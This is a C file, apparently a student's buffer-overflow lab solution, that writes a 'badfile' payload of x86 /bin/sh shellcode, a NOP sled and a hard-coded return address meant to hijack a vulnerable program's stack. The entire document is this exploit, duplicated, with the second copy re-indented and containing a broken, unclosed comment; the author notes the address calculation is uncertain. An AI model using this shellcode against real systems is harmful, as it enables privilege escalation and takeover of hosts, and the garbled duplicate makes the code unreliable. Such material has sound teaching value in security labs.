binary132/exploit.c

## exploit.c
/* exploit.c  */

/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdql                           */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    char mycode[20] =
 	/* first line: valid size of buf (12 bytes) */
	"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
	/* second line: skip past sfp (1 word) */
	"\xff\xff\xff\xff"
	/* third line: overwrite ret with beginning of shellcode */
	/* note: stack for bof() begins at ~0xbffff2f8 +/- 0x10?*/
	/* so buf starts at that minus 12(??? byte alignment) which is bffff2ec */
	/* first 20 bytes are stack smasher ---> bffff300 */
	/* then lots of NOPs */
	/* put script at end so it falls through */
	/* we'll jump somewhere shortly after our smasher --  */
	/* try 0xbffff340 */
        "\x40\xf3\xff\xbf"; /* this will be replaced */
	/* note: write in little-endian */

    /* (long*)(mycode+16)=0xbffff230; replace it here -- currently not working */

    /* now put this at the beginning of badfile. */

    int i;

    for( i = 0; i < 20; i++ )
    {
        buffer[i]=mycode[i];
    }

    /* this will now go at the end of the buffer */
    /* note word alignment floor truncation */

    int startpoint = ((516-strlen(shellcode)-20)/4)*4;
    int endpoint = startpoint+strlen(shellcode);

    int j = 0;

    for( i=startpoint,j; i < endpoint; i++,j++ )
    {
        buffer[i]=shellcode[j];
    }

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}
	/* exploit.c */

	/* A program that creates a file containing code for launching shell*/
	#include <stdlib.h>
	#include <stdio.h>
	#include <string.h>
	char shellcode[]=
	"\x31\xc0" /* xorl %eax,%eax */
	"\x50" /* pushl %eax */
	"\x68""//sh" /* pushl $0x68732f2f */
	"\x68""/bin" /* pushl $0x6e69622f */
	"\x89\xe3" /* movl %esp,%ebx */
	"\x50" /* pushl %eax */
	"\x53" /* pushl %ebx */
	"\x89\xe1" /* movl %esp,%ecx */
	"\x99" /* cdql */
	"\xb0\x0b" /* movb $0x0b,%al */
	"\xcd\x80" /* int $0x80 */
	;

	void main(int argc, char **argv)
	{
	char buffer[517];
	FILE *badfile;

	/* Initialize buffer with 0x90 (NOP instruction) */
	memset(&buffer, 0x90, 517);

	/* You need to fill the buffer with appropriate contents here */
	char mycode[20] =
	/* first line: valid size of buf (12 bytes) */
	"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
	/* second line: skip past sfp (1 word) */
	"\xff\xff\xff\xff"
	/* third line: overwrite ret with beginning of shellcode */
	/* note: stack for bof() begins at ~0xbffff2f8 +/- 0x10?*/
	/* so buf starts at that minus 12(??? byte alignment) which is bffff2ec */
	/* first 20 bytes are stack smasher ---> bffff300 */
	/* then lots of NOPs */
	/* put script at end so it falls through */
	/* we'll jump somewhere shortly after our smasher -- */
	/* try 0xbffff340 */
	"\x40\xf3\xff\xbf"; /* this will be replaced */
	/* note: write in little-endian */

	/* (long)(mycode+16)=0xbffff230; replace it here -- currently not working /

	/* now put this at the beginning of badfile. */

	int i;

	for( i = 0; i < 20; i++ )
	{
	buffer[i]=mycode[i];
	}

	/* this will now go at the end of the buffer */
	/* note word alignment floor truncation */

	int startpoint = ((516-strlen(shellcode)-20)/4)*4;
	int endpoint = startpoint+strlen(shellcode);

	int j = 0;

	for( i=startpoint,j; i < endpoint; i++,j++ )
	{
	buffer[i]=shellcode[j];
	}

	/* Save the contents to the file "badfile" */
	badfile = fopen("./badfile", "w");
	fwrite(buffer, 517, 1, badfile);
	fclose(badfile);
	}